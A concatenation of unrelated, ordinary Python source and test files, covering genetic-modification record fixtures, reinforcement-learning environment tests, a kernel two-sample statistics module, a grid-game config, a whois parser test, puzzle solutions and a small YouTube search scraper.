    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def interference_genetic_modification(
        testapp,
        lab,
        award,
        document,
        target):
    """Posted RNAi interference GM against a target."""
    payload = dict(
        award=award['@id'],
        documents=[document['@id']],
        lab=lab['@id'],
        category='interference',
        purpose='repression',
        method='RNAi',
        modified_site_by_target_id=target['@id'],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def crispr_knockout(lab, award):
    """Unposted payload: CRISPR knockout for characterization."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='knockout',
        purpose='characterization',
        method='CRISPR',
    )


@pytest.fixture
def recombination_knockout(lab, award):
    """Unposted payload: recombination knockout with coordinates."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='knockout',
        purpose='repression',
        method='site-specific recombination',
        modified_site_by_coordinates=dict(
            assembly="GRCh38",
            chromosome="11",
            start=60000,
            end=62000,
        ),
    )


@pytest.fixture
def characterization_insertion_transfection(lab, award):
    """Unposted payload: characterization insertion via stable transfection."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='characterization',
        nucleic_acid_delivery_method=['stable transfection'],
        modified_site_nonspecific='random',
        introduced_elements='synthesized DNA',
    )


@pytest.fixture
def characterization_insertion_CRISPR(lab, award):
    """Unposted payload: characterization insertion via CRISPR."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='characterization',
        method='CRISPR',
        modified_site_nonspecific='random',
        introduced_elements='synthesized DNA',
    )


@pytest.fixture
def disruption_genetic_modification(testapp, lab, award):
    """Posted CRISPR-cutting GM for characterization."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='CRISPR cutting',
        purpose='characterization',
        method='CRISPR',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def activation_genetic_modification(testapp, lab, award):
    """Posted CRISPRa GM for characterization."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='CRISPRa',
        purpose='characterization',
        method='CRISPR',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def binding_genetic_modification(testapp, lab, award):
    """Posted CRISPR dCas (binding) GM for characterization."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='CRISPR dCas',
        purpose='characterization',
        method='CRISPR',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def HR_knockout(lab, award, target):
    """Unposted payload: homologous-recombination knockout of a target."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='knockout',
        purpose='repression',
        method='homologous recombination',
        modified_site_by_target_id=target['@id'],
    )


@pytest.fixture
def CRISPR_introduction(lab, award):
    """Unposted payload: expression insertion via transient transfection."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='expression',
        nucleic_acid_delivery_method=['transient transfection'],
    )


@pytest.fixture
def genetic_modification_9(lab, award, human_donor_1):
    """Unposted payload: insertion GM associated with a human donor."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        donor=human_donor_1['@id'],
        category='insertion',
        purpose='expression',
        method='transient transfection',
    )


@pytest.fixture
def transgene_insertion(testapp, lab, award, ctcf):
    """Persisted insertion GM at the CTCF gene with an introduced sequence."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'in vivo enhancer characterization',
        'nucleic_acid_delivery_method': ['mouse pronuclear microinjection'],
        'modified_site_by_gene_id': ctcf['@id'],
        'introduced_sequence': 'ATCGTA',
    }
    response = testapp.post_json('/genetic_modification', payload)
    return response.json['@graph'][0]


@pytest.fixture
def guides_transduction_GM(testapp, lab, award):
    """Persisted guides-by-transduction GM (high MOI, sgRNA guides)."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'nucleic_acid_delivery_method': ['transduction'],
        'introduced_elements': 'gRNAs and CRISPR machinery',
        'MOI': 'high',
        'guide_type': 'sgRNA',
    }
    response = testapp.post_json('/genetic_modification', payload)
    return response.json['@graph'][0]


@pytest.fixture
def genetic_modification_10(lab, award):
    """Unposted payload: guides by transduction without MOI/guide_type."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'expression',
        'nucleic_acid_delivery_method': ['transduction'],
        'introduced_elements': 'gRNAs and CRISPR machinery',
    }
    return payload


@pytest.fixture
def genetic_modification_11(lab, award):
    """Unposted payload: generic CRISPR disruption for characterization."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'disruption',
        'purpose': 'characterization',
        'method': 'CRISPR',
    }
    return payload


@pytest.fixture
def transgene_insertion_2(testapp, lab, award, ctcf):
    """Unposted payload using the 'transgene insertion' category (not posted,
    unlike transgene_insertion; testapp is requested but unused here)."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'transgene insertion',
        'purpose': 'in vivo enhancer characterization',
        'nucleic_acid_delivery_method': ['mouse pronuclear microinjection'],
        'modified_site_by_gene_id': ctcf['@id'],
        'introduced_sequence': 'ATCGTA',
    }
    return payload


@pytest.fixture
def activation_genetic_modification_2(testapp, lab, award):
    """Unposted payload: CRISPR 'activation' category (testapp unused)."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'activation',
        'purpose': 'characterization',
        'method': 'CRISPR',
    }
    return payload


@pytest.fixture
def binding_genetic_modification_2(testapp, lab, award):
    """Unposted payload: CRISPR 'binding' category (testapp unused)."""
    payload = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'binding',
        'purpose': 'characterization',
        'method': 'CRISPR',
    }
    return payload

from slm_lab.env.vec_env import make_gym_venv
import numpy as np
import pytest


@pytest.mark.parametrize('name,state_shape,reward_scale', [
    ('PongNoFrameskip-v4', (1, 84, 84), 'sign'),
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_venv_nostack(name, num_envs, state_shape, reward_scale):
    """Without frame ops, transitions keep a leading per-env batch axis."""
    venv = make_gym_venv(name, num_envs, 0, frame_op=None, frame_op_len=None,
                         reward_scale=reward_scale)
    venv.reset()
    for _ in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    assert state.shape == (num_envs,) + state_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


# Argnames string normalized (stray space removed) for consistency with the
# sibling parametrizations in this module.
@pytest.mark.parametrize('name,state_shape,reward_scale', [
    ('PongNoFrameskip-v4', (1, 84, 84), 'sign'),
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_concat(name, num_envs, state_shape, reward_scale):
    """Concat frame op multiplies the first state axis by frame_op_len."""
    seed = 0
    frame_op = 'concat'  # used for image, or for concat vector
    frame_op_len = 4
    venv = make_gym_venv(name, num_envs, seed, frame_op=frame_op, frame_op_len=frame_op_len, reward_scale=reward_scale)
    venv.reset()
    for i in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    # Concatenation grows the first state dimension (channels for images).
    stack_shape = (num_envs, frame_op_len * state_shape[0],) + state_shape[1:]
    assert state.shape == stack_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


@pytest.mark.skip(reason='Not implemented yet')
@pytest.mark.parametrize('name,state_shape,reward_scale', [
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_stack(name, num_envs, state_shape, reward_scale):
    """'stack' frame op (for RNNs) adds a frame_op_len axis after the env axis."""
    frame_op_len = 4
    venv = make_gym_venv(name, num_envs, 0, frame_op='stack',
                         frame_op_len=frame_op_len, reward_scale=reward_scale)
    venv.reset()
    for _ in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    expected_shape = (num_envs, frame_op_len,) + state_shape
    assert isinstance(state, np.ndarray)
    assert state.shape == expected_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


@pytest.mark.parametrize('name,state_shape,image_downsize', [
    ('PongNoFrameskip-v4', (1, 84, 84), (84, 84)),
    ('PongNoFrameskip-v4', (1, 64, 64), (64, 64)),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_venv_downsize(name, num_envs, state_shape, image_downsize):
    """image_downsize controls the spatial resolution of returned frames."""
    venv = make_gym_venv(name, num_envs, 0, frame_op=None, frame_op_len=None,
                         image_downsize=image_downsize)
    venv.reset()
    for _ in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    assert state.shape == (num_envs,) + state_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()

"""Classification-based test and kernel two-sample test.

Author: Sandro Vega-Pons, Emanuele Olivetti.
"""

import os
import numpy as np
from sklearn.metrics import pairwise_distances, confusion_matrix
from sklearn.metrics import pairwise_kernels
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold, KFold, cross_val_score
from sklearn.grid_search import GridSearchCV
from kernel_two_sample_test import MMD2u, compute_null_distribution
from kernel_two_sample_test import compute_null_distribution_given_permutations
import matplotlib.pylab as plt
from joblib import Parallel, delayed


def compute_rbf_kernel_matrix(X):
    """Compute the RBF kernel matrix with sigma2 as the median pairwise
    distance.
    """
    # Median heuristic: bandwidth = (median Euclidean distance)^2.
    median_distance = np.median(pairwise_distances(X, metric='euclidean'))
    sigma2 = median_distance ** 2
    return pairwise_kernels(X, X, metric='rbf', gamma=1.0 / sigma2, n_jobs=-1)


def balanced_accuracy_scoring(clf, X, y):
    """Scoring function that computes the balanced accuracy to be used
    internally in the cross-validation procedure.

    Balanced accuracy = mean over classes of per-class recall
    (diagonal of the confusion matrix over its row sum).
    """
    conf_mat = confusion_matrix(y, clf.predict(X))
    n_classes = len(conf_mat)
    per_class_recall = [float(conf_mat[c, c]) / np.sum(conf_mat[c])
                        for c in range(n_classes)]
    return sum(per_class_recall) / n_classes


def compute_svm_cv(K, y, C=100.0, n_folds=5,
                   scoring=balanced_accuracy_scoring):
    """Compute cross-validated score of SVM with given precomputed kernel.

    Returns the mean score over a stratified K-fold split.
    """
    folds = StratifiedKFold(y, n_folds=n_folds)
    svm = SVC(C=C, kernel='precomputed', class_weight='auto')
    fold_scores = cross_val_score(svm, K, y, scoring=scoring, cv=folds)
    return fold_scores.mean()


def compute_svm_subjects(K, y, n_folds=5):
    """Cross-validated SVM score for paired (two-half) subject data.

    Assumes the kernel matrix K stacks two paired halves: row i and row
    len(K)//2 + i belong to the same subject, so both halves of a subject
    always fall in the same fold.

    Returns the mean accuracy over the K folds.
    """
    # BUG FIX: use floor division — `len(K)/2` is a float on Python 3 and
    # breaks KFold/indexing; `//` is identical on Python 2 for ints.
    half = len(K) // 2
    cv = KFold(half, n_folds)
    scores = np.zeros(n_folds)
    for i, (train, test) in enumerate(cv):
        # Mirror each fold's indices into the second half of the matrix.
        train_ids = np.concatenate((train, half + train))
        test_ids = np.concatenate((test, half + test))
        clf = SVC(kernel='precomputed')
        clf.fit(K[train_ids, :][:, train_ids], y[train_ids])
        scores[i] = clf.score(K[test_ids, :][:, train_ids], y[test_ids])

    return scores.mean()


def permutation_subjects(y):
    """Permute class labels of Contextual Disorder dataset.

    The first half of y gets random binary labels and the second half the
    complementary labels, preserving the pairing between halves.
    """
    # BUG FIX: floor division — `len(y)/2` is a float on Python 3 and
    # np.random.randint rejects a float size; `//` is unchanged on Python 2.
    half = len(y) // 2
    y_perm = np.random.randint(0, 2, half)
    y_perm = np.concatenate((y_perm, np.logical_not(y_perm).astype(int)))
    return y_perm


def permutation_subjects_ktst(y):
    """Permute class labels of Contextual Disorder dataset for KTST.

    Returns an index permutation of range(len(y)) that, per coin flip,
    swaps element i with its paired element half+i — i.e. swaps a
    subject's two halves while keeping the pairing intact.
    """
    # BUG FIX: floor division — `len(y)/2` is a float on Python 3, which
    # breaks randint/range/indexing; `//` is identical on Python 2.
    half = len(y) // 2
    yp = np.random.randint(0, 2, half)
    yp = np.concatenate((yp, np.logical_not(yp).astype(int)))
    y_perm = np.arange(len(y))
    for i in range(half):
        if yp[i] == 1:
            y_perm[i] = half + i
            y_perm[half + i] = i
    return y_perm


def compute_svm_score_nestedCV(K, y, n_folds,
                               scoring=balanced_accuracy_scoring,
                               random_state=None,
                               param_grid=[{'C': np.logspace(-5, 5, 25)}]):
    """Compute cross-validated score of SVM using precomputed kernel.

    Nested scheme: the outer stratified K-fold estimates generalization;
    within each outer training split, GridSearchCV runs an inner stratified
    K-fold (same n_folds) to select C. Returns the mean outer-fold score.
    """
    # NOTE(review): mutable default argument for param_grid — shared across
    # calls; safe only while no caller mutates it.
    cv = StratifiedKFold(y, n_folds=n_folds, shuffle=True,
                         random_state=random_state)
    scores = np.zeros(n_folds)
    for i, (train, test) in enumerate(cv):
        cvclf = SVC(kernel='precomputed')
        y_train = y[train]
        # Inner CV on the outer training labels only.
        cvcv = StratifiedKFold(y_train, n_folds=n_folds,
                               shuffle=True,
                               random_state=random_state)
        clf = GridSearchCV(cvclf, param_grid=param_grid, scoring=scoring,
                           cv=cvcv, n_jobs=1)
        # Rows and columns are sliced consistently so the precomputed kernel
        # stays aligned with the selected samples.
        clf.fit(K[train, :][:, train], y_train)
        # print clf.best_params_
        scores[i] = clf.score(K[test, :][:, train], y[test])

    return scores.mean()


def apply_svm(K, y, n_folds=5, iterations=10000, subjects=False, verbose=True,
              random_state=None):
    """
    Compute the balanced accuracy, its null distribution and the p-value.

    Parameters:
    ----------
    K: array-like
        Kernel matrix
    y: array_like
        class labels
    n_folds: int
        Number of folds in the stratified cross-validation
    iterations: int
        Number of label permutations used to build the null distribution
    subjects: bool
        If True, use the paired-subjects scheme (compute_svm_subjects /
        permutation_subjects) instead of generic nested CV.
    verbose: bool
        Verbosity
    random_state: int, RandomState or None
        Seed forwarded to the cross-validation shuffling.

    Returns:
    -------
    acc: float
        Average balanced accuracy.
    acc_null: array
        Null distribution of the balanced accuracy.
    p_value: float
         p-value
    """
    # Computing the accuracy
    param_grid = [{'C': np.logspace(-5, 5, 20)}]
    if subjects:
        acc = compute_svm_subjects(K, y, n_folds)
    else:
        acc = compute_svm_score_nestedCV(K, y, n_folds, param_grid=param_grid,
                                         random_state=random_state)
    if verbose:
        print("Mean balanced accuracy = %s" % (acc))
        print("Computing the null-distribution.")

    # Computing the null-distribution: score permuted labels in parallel.
    if subjects:
        yis = [permutation_subjects(y) for i in range(iterations)]
        acc_null = Parallel(n_jobs=-1)(delayed(compute_svm_subjects)(K, yis[i], n_folds) for i in range(iterations))
    else:
        yis = [np.random.permutation(y) for i in range(iterations)]
        acc_null = Parallel(n_jobs=-1)(delayed(compute_svm_score_nestedCV)(K, yis[i], n_folds, scoring=balanced_accuracy_scoring, param_grid=param_grid) for i in range(iterations))

    # BUG FIX: Parallel returns a plain list, and `list > float` is not an
    # elementwise comparison, so `(acc_null > acc).sum()` was broken.
    # Convert to an ndarray (which the docstring promises anyway).
    acc_null = np.array(acc_null)

    p_value = max(1.0 / iterations, (acc_null > acc).sum()
                  / float(iterations))
    if verbose:
        print("p-value ~= %s \t (resolution : %s)" % (p_value, 1.0/iterations))

    return acc, acc_null, p_value


def apply_ktst(K, y, iterations=10000, subjects=False, verbose=True):
    """
    Compute MMD^2_u, its null distribution and the p-value of the
    kernel two-sample test.

    Parameters:
    ----------
    K: array-like
        Kernel matrix
    y: array_like
        class labels
    iterations: int
        number of permutations used to build the null distribution
    subjects: bool
        if True, permute with the paired-subjects scheme
        (permutation_subjects_ktst) instead of free permutations
    verbose: bool
        Verbosity

    Returns:
    -------
    mmd2u: float
        MMD^2_u value.
    acc_null: array
        Null distribution of the MMD^2_u
    p_value: float
         p-value
    """
    assert len(np.unique(y)) == 2, 'KTST only works on binary problems'

    # Assuming that the first m rows of the kernel matrix are from one
    # class and the other n rows from the second class.
    m = len(y[y == 0])
    n = len(y[y == 1])
    mmd2u = MMD2u(K, m, n)
    if verbose:
        print("MMD^2_u = %s" % mmd2u)
        print("Computing the null distribution.")
    if subjects:
        # Paired permutations preserve the subject pairing between halves.
        perms = [permutation_subjects_ktst(y) for i in range(iterations)]
        mmd2u_null = compute_null_distribution_given_permutations(K, m, n,
                                                                  perms,
                                                                  iterations)
    else:
        mmd2u_null = compute_null_distribution(K, m, n, iterations,
                                               verbose=verbose)

    # p-value is lower-bounded by the permutation resolution 1/iterations.
    p_value = max(1.0/iterations, (mmd2u_null > mmd2u).sum()
                  / float(iterations))
    if verbose:
        print("p-value ~= %s \t (resolution : %s)" % (p_value, 1.0/iterations))

    return mmd2u, mmd2u_null, p_value


def plot_null_distribution(stats, stats_null, p_value, data_name='',
                           stats_name='$MMD^2_u$', save_figure=True):
    """Plot the observed value for the test statistic, its null
    distribution and p-value.

    When save_figure is True the plot is written to
    figures/<data_name>_<ktst|clf>.pdf (directory created on demand).
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    # NOTE(review): `normed` was deprecated and then removed from
    # matplotlib's hist() (3.1+); modern matplotlib needs density=True.
    # Left unchanged because this module targets the same era as its
    # sklearn.cross_validation imports — confirm the pinned matplotlib.
    prob, bins, patches = plt.hist(stats_null, bins=50, normed=True)
    # Mark the observed statistic as a white star just above the x-axis.
    ax.plot(stats, prob.max()/30, 'w*', markersize=15,
            markeredgecolor='k', markeredgewidth=2,
            label="%s = %s" % (stats_name, stats))

    ax.annotate('p-value: %s' % (p_value),
                xy=(float(stats), prob.max()/9.),  xycoords='data',
                xytext=(-105, 30), textcoords='offset points',
                bbox=dict(boxstyle="round", fc="1."),
                arrowprops={"arrowstyle": "->",
                            "connectionstyle": "angle,angleA=0,angleB=90,rad=10"},
                )
    plt.xlabel(stats_name)
    plt.ylabel('p(%s)' % stats_name)
    plt.legend(numpoints=1)
    plt.title('Data: %s' % data_name)

    if save_figure:
        save_dir = 'figures'
        if not os.path.exists(save_dir):
            os.makedirs(save_dir)

        # 'ktst' marks the MMD statistic, 'clf' the classifier accuracy.
        stn = 'ktst' if stats_name == '$MMD^2_u$' else 'clf'
        fig_name = os.path.join(save_dir, '%s_%s.pdf' % (data_name, stn))
        fig.savefig(fig_name)

from collections import namedtuple

# Simple (x, y) pair for a window size.
Resolution = namedtuple('Resolution', ['x', 'y'])


class Resolutions(object):
    """Whitelist of supported window resolutions."""

    resolutions = [
        (1920, 1200),
        (1920, 1080),
        (1680, 1050),
        (1440, 900),
        (1360, 768),
        (1280, 800),
        (1024, 640),
    ]

    @classmethod
    def parse(cls, x, y):
        """Return Resolution(x, y) when supported, else raise with the
        list of available resolutions."""
        if (x, y) in cls.resolutions:
            return Resolution(x, y)
        resolutions = ', '.join(['%sx%s' % (a, b) for a, b in cls.resolutions])
        raise Exception('Resolution %s x %s not supported. Available resolutions: %s' % (x, y, resolutions))

class Color(object):
    """Named RGBA color constants (floats in [0, 1]) with lookup by name."""

    gray = (0.15, 0.15, 0.13, 1.0)
    black = (0.0, 0.0, 0.0, 1.0)
    white = (1.0, 1.0, 1.0, 1.0)
    red = (1.0, 0.2, 0.0, 1.0)
    orange = (1.0, 0.4, 0.0, 1.0)
    yellow = (1.0, 0.9, 0.0, 1.0)
    light_green = (0.4, 1.0, 0.0, 1.0)
    green = (0.0, 1.0, 0.2, 1.0)
    cyan = (0.0, 1.0, 0.4, 1.0)
    light_blue = (0.0, 0.6, 1.0, 1.0)
    blue = (0.0, 0.2, 1.0, 1.0)
    purple = (0.4, 0.0, 1.0, 1.0)
    pink = (1.0, 0.0, 0.8, 1.0)

    @classmethod
    def __colors(cls):
        # Class attributes that are public color names (skip dunders,
        # privates and the lookup helper itself).
        return [key for key in cls.__dict__.keys()
                if not key.startswith('_') and key != 'named']

    @classmethod
    def named(cls, name):
        """Return the RGBA tuple for `name`; raise for unknown names."""
        if not hasattr(cls, name):
            colors = ', '.join(cls.__colors())
            raise Exception('Unknown color %s. Available colors are: %s' % (name, colors))
        return getattr(cls, name)

def try_parse(value):
    """Parse a raw config string: int when possible, else map
    'true'/'false' (case-insensitive) to bool, else return it unchanged."""
    try:
        return int(value)
    except ValueError:
        # BUG FIX: was a bare `except:` which swallowed every exception
        # (including KeyboardInterrupt); only "not an int" is expected here.
        return {'true': True, 'false': False}.get(value.lower(), value)

def read_config():
    """Read `key = value` pairs from config.cfg into a dict.

    Blank lines and lines without '=' are skipped; spaces are stripped
    and values go through try_parse for int/bool coercion.
    """
    cfg = {}
    with open('config.cfg', 'r') as cfg_file:
        for raw_line in cfg_file:
            if not raw_line.strip() or '=' not in raw_line:
                continue
            key, value = raw_line.strip().replace(' ', '').split('=')
            cfg[key] = try_parse(value)
    return cfg

# Load the user configuration once at import time.
cfg = read_config()

NUM_CELLS = cfg.get('CELLS', 100)  # grid is NUM_CELLS x NUM_CELLS
RESOLUTION = Resolutions.parse(cfg.get('WINDOW_WIDTH', 1280), cfg.get('WINDOW_HEIGHT', 800))
# The shorter window side bounds the square playing field.
limit = min(RESOLUTION)
# NOTE(review): integer division on Python 2, float on Python 3 — the
# derived offsets change type accordingly; confirm the intended runtime.
PIXEL_PER_CELL = limit / NUM_CELLS
# Center the grid inside the window.
OFFSET_X = (RESOLUTION.x - (NUM_CELLS * PIXEL_PER_CELL)) / 2
OFFSET_Y = (RESOLUTION.y - (NUM_CELLS * PIXEL_PER_CELL)) / 2

SHOW_FULLSCREEN = cfg.get('FULLSCREEN', False)
SHOW_GRID = cfg.get('SHOW_GRID', True)
BACKGROUND_COLOR = Color.named(cfg.get('BACKGROUND_COLOR', 'black'))
GRID_BACKDROP_COLOR = Color.named(cfg.get('GRID_BACKDROP_COLOR', 'gray'))
GRID_LINE_COLOR = Color.named(cfg.get('GRID_LINE_COLOR', 'black'))
CELL_COLOR = Color.named(cfg.get('CELL_COLOR', 'green'))
CURSOR_COLOR = Color.named(cfg.get('CURSOR_COLOR', 'red'))

# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
#   spec/fixtures/responses/whois.nic.pw/status_available
#
# and regenerate the tests with the following script
#
#   $ scripts/generate_tests.py
#

from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois

class TestWhoisNicPwStatusAvailable(object):
    """Autogenerated checks for parsing a whois.nic.pw 'available' response."""

    def setUp(self):
        fixture_path = "spec/fixtures/responses/whois.nic.pw/status_available.txt"
        host         = "whois.nic.pw"
        # BUG FIX: close the fixture file instead of leaking the handle
        # (the original `open(...).read()` never closed it).
        with open(fixture_path, "r") as fixture:
            part = yawhois.record.Part(fixture.read(), host)
        self.record  = yawhois.record.Record(None, [part])

    def test_status(self):
        eq_(self.record.status, [])

    def test_available(self):
        eq_(self.record.available, True)

    def test_domain(self):
        eq_(self.record.domain, None)

    def test_nameservers(self):
        eq_(self.record.nameservers.__class__.__name__, 'list')
        eq_(self.record.nameservers, [])

    def test_admin_contacts(self):
        eq_(self.record.admin_contacts.__class__.__name__, 'list')
        eq_(self.record.admin_contacts, [])

    def test_registered(self):
        eq_(self.record.registered, False)

    def test_created_on(self):
        eq_(self.record.created_on, None)

    def test_registrar(self):
        eq_(self.record.registrar, None)

    def test_registrant_contacts(self):
        eq_(self.record.registrant_contacts.__class__.__name__, 'list')
        eq_(self.record.registrant_contacts, [])

    def test_technical_contacts(self):
        eq_(self.record.technical_contacts.__class__.__name__, 'list')
        eq_(self.record.technical_contacts, [])

    def test_updated_on(self):
        eq_(self.record.updated_on, None)

    def test_domain_id(self):
        eq_(self.record.domain_id, None)

    def test_expires_on(self):
        eq_(self.record.expires_on, None)

    def test_disclaimer(self):
        eq_(self.record.disclaimer, None)

class Solution(object):
    def missingNumber(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        XOR of 0..n with all array entries cancels every present value,
        leaving exactly the missing one.
        """
        result = len(nums)
        for index, value in enumerate(nums):
            result = result ^ index ^ value
        return result

# Ad-hoc smoke test (Python 2 print statement); expected output: 1, 0, 2, 8.
inputs = [
    [0],
    [1],
    [3,0,1],
    [9,6,4,2,3,5,7,0,1]
]

s = Solution()
for i in inputs:
    print s.missingNumber(i)

import _plotly_utils.basevalidators


class MinexponentValidator(_plotly_utils.basevalidators.NumberValidator):
    # Autogenerated plotly validator for choropleth.colorbar.minexponent:
    # a number constrained to min >= 0, applied under the 'colorbars'
    # edit type unless overridden via kwargs.
    def __init__(
        self, plotly_name="minexponent", parent_name="choropleth.colorbar", **kwargs
    ):
        super(MinexponentValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "colorbars"),
            min=kwargs.pop("min", 0),
            **kwargs
        )

import urllib
import urllib2
from bs4 import BeautifulSoup

# Scrape YouTube search results for a hard-coded query and print the video
# URLs (Python 2: urllib/urllib2, print statement).
# NOTE(review): the 'yt-uix-tile-link' class comes from YouTube's old HTML
# results page and likely no longer matches the current markup — verify.
textToSearch = 'gorillaz'
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html)  # no explicit parser: bs4 picks one and warns
for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):
        print 'https://www.youtube.com' + vid['href']


########################################
# Automatically generated, do not edit.
########################################


from pyvisdk.thirdparty import Enum

# Autogenerated enumeration of datastore maintenance-mode states
# (pyvisdk / vSphere API).
DatastoreSummaryMaintenanceModeState = Enum(
    'enteringMaintenance',
    'inMaintenance',
    'normal',

)

from math import floor


def score_syntax_errors(program_lines):
    """Return (corruption score, middle autocomplete score) for the input.

    Corrupted lines add their first bad closer's points; incomplete lines
    contribute an autocomplete score, of which the median is returned.
    """
    corrupt_points = {')': 3, ']': 57, '}': 1197, '>': 25137}
    corrupt_total = 0
    completion_scores = []

    for line in program_lines:
        bad_char, remainder = corrupted_character(line)
        if bad_char is None:
            completion_scores.append(score_autocomplete(remainder))
        else:
            corrupt_total += corrupt_points[bad_char]

    completion_scores.sort()
    return corrupt_total, completion_scores[floor(len(completion_scores) / 2)]


def corrupted_character(inp):
    """Scan one line; return (first corrupt closer or None, completion list).

    The completion list holds the closers needed to finish the line,
    innermost first.
    """
    openers = {'(': ')', '[': ']', '{': '}', '<': '>'}
    closers = {close: open_ for open_, close in openers.items()}
    pending = []

    def completion(seq):
        return [openers[char] for char in reversed(seq)]

    for char in inp:
        if char in openers:
            pending.append(char)
        elif char in closers:
            if pending.pop() != closers[char]:
                return char, completion(pending)
        else:
            print(f"INVALID {char}")

    return None, completion(pending)


def score_autocomplete(stack):
    """Score a completion sequence: total = total*5 + points per closer."""
    char_points = {')': 1, ']': 2, '}': 3, '>': 4}
    total = 0
    for closing in stack:
        total = total * 5 + char_points[closing]
    return total


def test_corrupted_character():
    """First corrupted closer of each AoC sample line."""
    cases = [
        ('{([(<{}[<>[]}>{[]{[(<()>', '}'),
        ('[[<[([]))<([[{}[[()]]]', ')'),
        ('[{[{({}]{}}([{[{{{}}([]', ']'),
        ('[<(<(<(<{}))><([]([]()', ')'),
        ('<{([([[(<>()){}]>(<<{{', '>'),
    ]
    for line, expected in cases:
        assert corrupted_character(line)[0] == expected


def test_score_syntax_errors():
    # End-to-end check against the AoC 2021 day 10 sample input file.
    assert score_syntax_errors(open('input/10.test').read().splitlines()) == (26397, 288957)


def test_corrupted_character_stack():
    # Completion list for an uncorrupted line, innermost closer first.
    assert corrupted_character('[({(<(())[]>[[{[]{<()<>>')[1] == ['}', '}', ']', ']', ')', '}', ')', ']']


def test_scoring_autocomplete():
    """Autocomplete scores for the AoC sample completions."""
    expected = [
        ('}}]])})]', 288957),
        (')}>]})', 5566),
        ('}}>}>))))', 1480781),
    ]
    for completion, score in expected:
        assert score_autocomplete(completion) == score


if __name__ == '__main__':
    # Solve both parts for the real puzzle input.
    print(score_syntax_errors(open('input/10').read().splitlines()))

#!/usr/bin/python

#
# Config file test app (together with test.cfg file)
#

import os, sys

sys.path.append("..")

import configfile

# Exercise ConfigFile: set defaults in two sections, load test.cfg from
# disk, read values back with the typed accessors, then write a modified
# copy to test-mod.cfg (Python 2 print statements throughout).
cfg = configfile.ConfigFile("test.cfg")

# NOTE(review): values are set before load() — presumably the setters
# define defaults that load() merges with the file; confirm against the
# configfile module.
cfg.setCfgValue("name1", "value1")
cfg.setCfgValue("name2", "value2")
cfg.selectSection("user")
cfg.setCfgValue("username", "janis")
cfg.setCfgValue("acceptable_names", ["john", "janis"])
cfg.load()

# Dump raw options and typed reads for both sections.
print cfg.cfg.options("main")
print cfg.cfg.options("user")
print cfg.getCfgValue("username")
print type(cfg.getCfgValue("username"))
print cfg.getCfgValueAsList("acceptable_names")
print cfg.getCfgValueAsList("list_in_list")
cfg.selectSection("main")
print cfg.getCfgValueAsInt("a_number")
print type(cfg.getCfgValueAsInt("a_number"))
print cfg.getCfgValueAsBool("a_bool")
print type(cfg.getCfgValueAsBool("a_bool"))

# Redirect output to a second file and save modified values, including
# lists whose elements themselves contain bracketed text.
cfg.filename = "test-mod.cfg"
cfg.selectSection("main")
